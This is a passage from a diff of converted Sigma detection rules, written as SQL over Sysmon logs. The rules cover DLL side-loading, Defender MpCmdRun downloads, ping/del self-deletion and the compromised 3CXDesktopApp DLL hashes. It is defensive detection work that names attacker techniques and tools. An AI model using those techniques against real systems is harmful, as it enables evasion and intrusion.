ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((Image LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "title": "Windows Defender Download Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", "status": "test", - "description": "Detects processes loading modules related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE '%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN ('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE 